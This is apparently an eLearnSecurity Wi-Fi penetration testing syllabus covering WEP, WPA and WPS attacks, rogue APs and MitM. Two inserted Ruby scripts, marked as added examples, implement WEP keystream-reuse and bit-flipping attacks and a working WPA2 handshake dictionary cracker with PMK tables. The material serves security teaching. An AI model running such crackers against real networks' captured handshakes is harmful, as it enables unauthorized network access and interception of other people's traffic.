The Wi-Fi Security section is an extremely in-depth section covering all the most important attack techniques used against Wi-Fi networks. The student will learn the security mechanisms implemented in Wi-Fi architectures as well as their weaknesses and how to exploit them.

- Module 1: Prerequisites
- Module 2: Environment setup
- Module 3: Wireless Standards and Networks
- Module 4: Discover Wi-Fi Networks
- Module 5: Traffic Analysis
- Module 6: Attacking Wi-Fi Networks
- Module 7: Wi-Fi as attack vector

1. Prerequisites

In the first module of the Wi-Fi section, we will see what the hardware and software prerequisites of the course are.

Topics:
- Hardware: Antennas; A note on signal strength
- Software
- Conclusions
2. Environment setup

In this module, the student will learn how to properly configure the test environment in order to obtain the best outcome from the subsequent modules.

Topics:
- Introduction; Considerations on Linux drivers; Adapter configuration; Monitor mode; Testing your setup

Downloadable exercises are included in this module.

3. Wireless Standards and Networks

In this module, the student will learn the basic concepts at the base of Wi-Fi infrastructures. We will see which types of Wi-Fi configurations exist, how they work and which security features and mechanisms are implemented. We will also present an overview of the most important flaws that affect the different types of wireless infrastructures and protocols.

Topics:
- IEEE 802.11 Standards
- Types of Wireless Network: Infrastructure Network; Ad-Hoc Network
- Wireless Frames: Management Frames (Beacon, Probe requests, Probe responses, Authentication, Association request, Association response, Reassociation request/response, Disassociation frame, Deauthentication frame)
- Security Features: Authentication (Open System, Shared Key Authentication); Encryption
- WEP: RC4; Initialization vector; Integrity Check Value; CRC-32
- WEP flaws: Keystream reuse; Known plaintext attack; Birthday paradox; Bit-flipping attack; FMS attack; KoreK; PTW
- WPA: Temporal Key Integrity Protocol
- WPA2: CCMP/AES

Downloadable scripts are included in this module.

4. Discover Wi-Fi Networks

The first step when we run a penetration test against Wi-Fi networks is to discover and identify our target. In this module, we will see how to do this through a series of tools available for different platforms.

Topics:
- Tools: Airodump-ng; inSSIDer; Kismet
- Hidden SSID: Network de-cloaking

Downloadable exercises are included in this module.

5. Traffic Analysis

After the target network has been identified, the next step is to configure our tools in order to sniff and intercept the traffic. This is a very important step for all the attacks that come hereafter.

Topics:
- Capturing traffic: Channel Hopping; Wireshark filters; Traffic decryption
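Two of the WEP flaws listed under Module 3, "Keystream reuse" with a "Known plaintext" and the "Bit-flipping attack" on the CRC-32 "Integrity Check Value", reproduced on toy frames as an added example that is not part of the course scripts. RC4 is seeded with IV || key, so a repeated IV yields the same keystream and one known plaintext hands over the keystream for every frame sent under that IV; CRC-32 is linear, so the encrypted ICV can be patched to match a modified ciphertext without knowing the key. The key, IVs and frame payloads are constructed for the demo.

```ruby
# Added example (not course material): WEP keystream reuse and ICV bit-flipping
# on constructed frames. Key, IVs and payloads are made up for the demo.
require "zlib"

# RC4 keystream generator (KSA followed by PRGA), the cipher WEP relies on.
def rc4_keystream(key, length)
  s = (0..255).to_a
  k = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + k[i % k.size]) & 0xff
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  Array.new(length) do
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    s[(s[i] + s[j]) & 0xff]
  end.pack("C*")
end

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack("C*")
end

def icv(plaintext)
  [Zlib.crc32(plaintext)].pack("V")            # CRC-32, little-endian on the wire
end

# Sender: frame = IV || RC4(IV || key) XOR (plaintext || ICV). The IV travels in clear.
def wep_encrypt(key, iv, plaintext)
  plaintext = plaintext.b
  iv + xor_bytes(plaintext + icv(plaintext), rc4_keystream(iv + key, plaintext.bytesize + 4))
end

# Receiver: decrypt and check the ICV; returns the plaintext, or nil if the ICV fails.
def wep_decrypt(key, frame)
  iv, ct = frame[0, 3], frame[3..]
  pt_icv = xor_bytes(ct, rc4_keystream(iv + key, ct.bytesize))
  pt, tag = pt_icv[0...-4], pt_icv[-4..]
  tag == icv(pt) ? pt : nil
end

# Keystream reuse: a frame whose plaintext is known leaks the keystream for its IV.
def recover_keystream(frame, known_plaintext)
  known_plaintext = known_plaintext.b
  xor_bytes(frame[3..], known_plaintext + icv(known_plaintext))
end

# Read another frame that reused the same IV, using the recovered keystream only.
def decrypt_with_keystream(frame, keystream)
  ct = frame[3..]
  xor_bytes(ct, keystream[0, ct.bytesize])[0...-4]
end

# Bit-flipping: XOR `delta` into the encrypted payload and fix the encrypted ICV.
# CRC-32 is affine: crc(p ^ d) = crc(p) ^ crc(d) ^ crc(zeros of the same length),
# so the correction depends on the delta alone, never on the unknown plaintext.
def flip_bits(frame, delta)
  iv, ct = frame[0, 3], frame[3..]
  len = ct.bytesize - 4
  delta = delta.b.ljust(len, "\x00".b)
  icv_fix = [Zlib.crc32(delta) ^ Zlib.crc32("\x00".b * len)].pack("V")
  iv + xor_bytes(ct, delta + icv_fix)
end

# Demo: a 40-bit key, one IV reused for two frames, and a third frame whose
# amount field is tampered with. Flipping without the ICV fix is shown to fail.
def demo_wep
  key = "\x0b\xad\xc0\xff\xee".b
  iv  = "\x01\x02\x03".b
  known  = "GET /index.html HTTP/1.0".b
  secret = "PASS hunter2 and more...".b
  f1 = wep_encrypt(key, iv, known)
  f2 = wep_encrypt(key, iv, secret)            # same IV => same keystream
  leaked = decrypt_with_keystream(f2, recover_keystream(f1, known))

  f3 = wep_encrypt(key, "\x04\x05\x06".b, "PAY 0100 TO ALICE".b)
  delta = "\x00".b * 4 + xor_bytes("0", "9")   # flip the first digit: 0100 -> 9100
  tampered = wep_decrypt(key, flip_bits(f3, delta))
  naive = wep_decrypt(key, f3[0, 3] + xor_bytes(f3[3..], delta.ljust(f3.bytesize - 3, "\x00".b)))
  puts "leaked: #{leaked} / tampered: #{tampered.inspect} / unpatched ICV: #{naive.inspect}"
  { leaked: leaked, tampered: tampered, naive: naive }
end

demo_wep if $PROGRAM_NAME == __FILE__
```

The 24-bit IV space is what makes the first flaw practical (the "Birthday paradox" item): on a busy network an IV repeats within hours, and ARP replies give the attacker the known plaintext. The second flaw is why a linear checksum such as CRC-32 can never serve as a message authentication code; WPA's TKIP added a keyed MIC (Michael) and WPA2 uses CCMP for exactly this reason.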
6. Attacking Wi-Fi Networks

The following module focuses on the attacks that can be executed on Wi-Fi networks, according to their configuration and security mechanism. We will first start exploring the attacks against WEP and then focus our tests on more secure networks: WPA, WPA2 and WPS. The student will learn how to attack and access remote Wi-Fi networks, obtain keys and passwords, and much more.

Topics:
- Overview and Setup
- WEP: ARP replay Attack; Cracking the key with aircrack-ng; Running PTW attack with aircrack-ng; KoreK attack; Clientless WEP cracking; Bypassing Shared Key Authentication; Attacking the client (Caffe-Latte overview, Practical Caffe-Latte Attack)
- WPA and WPA2: The Four-Way Handshake; Deauthentication attack; Capture the handshake; Using aircrack-ng against the handshake; Build a wordlist with crunch; A note on cracking speed; Exploit the GPU power (Pyrit, oclHashcat); Space-time tradeoff (Pre-built hash files); Cracking as a Service (CloudCracker)
- WPS
- Conclusions

Downloadable exercises are included in this module.

7. Wi-Fi as attack vector

In the last module of the Wi-Fi section, the student will learn how to use Wi-Fi as an attack vector. This means that we will not attack Wi-Fi networks; instead we will use Wi-Fi in order to create fake networks, obtain credentials, run MitM attacks and much more.

Topics:
- Rogue AP: A typical Rogue AP scenario; Recover PRGA with a rogue AP; Initiate a WPA/WPA2 handshake
- Man in the Middle attack
- Wardriving
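The WPA/WPA2 items under Module 6 ("The Four-Way Handshake", "Using aircrack-ng against the handshake", "A note on cracking speed", "Space-time tradeoff", "Pre-built hash files"), as an added example that is not part of the course material: the computation aircrack-ng performs on a captured handshake, written out with Ruby's OpenSSL binding. For each candidate passphrase the PMK is derived with PBKDF2-HMAC-SHA1 over the SSID, the PTK with the 802.11i PRF-512, and the MIC of EAPOL message 2 is recomputed with the KCK and compared with the captured one. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are constructed; the "captured" MIC is generated from a known passphrase so the script is self-checking.

```ruby
# Added example (not course material): a dictionary attack on a captured WPA2
# four-way handshake. SSID, MACs, nonces, EAPOL frame and wordlist are constructed.
require "openssl"

# PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
def pmk(passphrase, ssid)
  OpenSSL::KDF.pbkdf2_hmac(passphrase, salt: ssid, iterations: 4096, length: 32, hash: "sha1")
end

# IEEE 802.11i PRF-512: HMAC-SHA1(PMK, A || 0x00 || B || i) for i = 0..3, first 64 bytes,
# with B = min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce).
def ptk(pmk, ap_mac, sta_mac, anonce, snonce)
  b = [ap_mac, sta_mac].min + [ap_mac, sta_mac].max + [anonce, snonce].min + [anonce, snonce].max
  (0..3).map { |i| OpenSSL::HMAC.digest("sha1", pmk, "Pairwise key expansion\x00".b + b + i.chr) }.join[0, 64]
end

# WPA2/CCMP MIC: HMAC-SHA1 with the KCK over the EAPOL-Key frame, MIC field
# (16 bytes at offset 81) zeroed, truncated to 16 bytes.
def eapol_mic(kck, eapol)
  zeroed = eapol.dup
  zeroed[81, 16] = "\x00".b * 16
  OpenSSL::HMAC.digest("sha1", kck, zeroed)[0, 16]
end

# Straight dictionary attack: one PBKDF2 (4096 HMAC-SHA1 rounds) per candidate.
# That PBKDF2 is why cracking speed is measured in thousands of keys/s per core.
def crack_handshake(hs, wordlist)
  wordlist.each do |candidate|
    kck = ptk(pmk(candidate, hs[:ssid]), hs[:ap_mac], hs[:sta_mac], hs[:anonce], hs[:snonce])[0, 16]
    return candidate if eapol_mic(kck, hs[:eapol]) == hs[:mic]
  end
  nil
end

# Space-time tradeoff: PBKDF2 depends only on (passphrase, SSID), so the PMKs
# for a common SSID can be computed once and reused against every handshake
# captured on that SSID. Pre-built hash files are exactly such tables.
def pmk_table(wordlist, ssid)
  wordlist.to_h { |w| [w, pmk(w, ssid)] }
end

def crack_with_table(hs, table)
  table.each do |candidate, pmk|
    kck = ptk(pmk, hs[:ap_mac], hs[:sta_mac], hs[:anonce], hs[:snonce])[0, 16]
    return candidate if eapol_mic(kck, hs[:eapol]) == hs[:mic]
  end
  nil
end

# Constructed "capture": fixed SSID, MACs and nonces plus a 121-byte EAPOL-Key
# message 2 (4-byte EAPOL header, key descriptor, MIC, 22-byte key data).
def build_handshake(passphrase)
  ssid    = "ELS-Lab"
  ap_mac  = "\x00\x11\x22\x33\x44\x55".b
  sta_mac = "\x66\x77\x88\x99\xaa\xbb".b
  anonce  = (0...32).to_a.pack("C*")
  snonce  = (0...32).map { |i| 255 - i }.pack("C*")
  eapol = "\x01\x03\x00\x75".b +                      # EAPOL v1, type Key, body length 117
          "\x02\x01\x0a\x00\x10".b +                  # RSN descriptor, key info 0x010a, key length 16
          "\x00".b * 7 + "\x01".b +                   # replay counter 1
          snonce + "\x00".b * 32 +                    # SNonce, then IV, RSC and ID (zero)
          "\x00".b * 16 +                             # MIC placeholder
          "\x00\x16".b + "\x30\x14".b + "\x00".b * 20 # key data length 22 + RSN IE
  hs = { ssid: ssid, ap_mac: ap_mac, sta_mac: sta_mac, anonce: anonce, snonce: snonce, eapol: eapol }
  kck = ptk(pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[0, 16]
  hs[:mic] = eapol_mic(kck, eapol)
  eapol[81, 16] = hs[:mic]                            # as the MIC appears in the capture
  hs
end

WORDLIST = %w[password 12345678 qwertyuiop CorrectHorse9 trustno1].freeze   # constructed

def demo_crack
  hs = build_handshake("CorrectHorse9")
  direct = crack_handshake(hs, WORDLIST)
  tabled = crack_with_table(hs, pmk_table(WORDLIST, hs[:ssid]))
  puts "passphrase: #{direct.inspect} (direct) / #{tabled.inspect} (PMK table)"
  [direct, tabled]
end

demo_crack if $PROGRAM_NAME == __FILE__
```

Only message 2 (or messages 1 and 2, for the ANonce) are needed, which is why a deauthentication of one client followed by a short capture is enough; everything after the PMK step is cheap, so GPU crackers and precomputed PMK tables both attack the PBKDF2 cost and nothing else.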
About eLearnSecurity

A leading innovator in the field of practical, hands-on IT security training. Based in Pisa (Italy), Dubai (UAE) and San Jose (USA), eLearnSecurity is a leading provider of IT security and penetration testing courses, including certifications for IT professionals. eLearnSecurity's mission is to advance the career of IT security professionals by providing affordable and comprehensive education and certification. All eLearnSecurity courses utilize engaging eLearning and the most effective mix of theory, practice and methodology in IT security, all with real-world lessons that students can immediately apply to build relevant sk

ills and keep their organization's data and systems safe.

© 2014 eLearnSecurity S.R.L, Via Matteucci 36/38, 56124 Pisa, Italy. For more information, please visit http://www.elearnsecurity.com.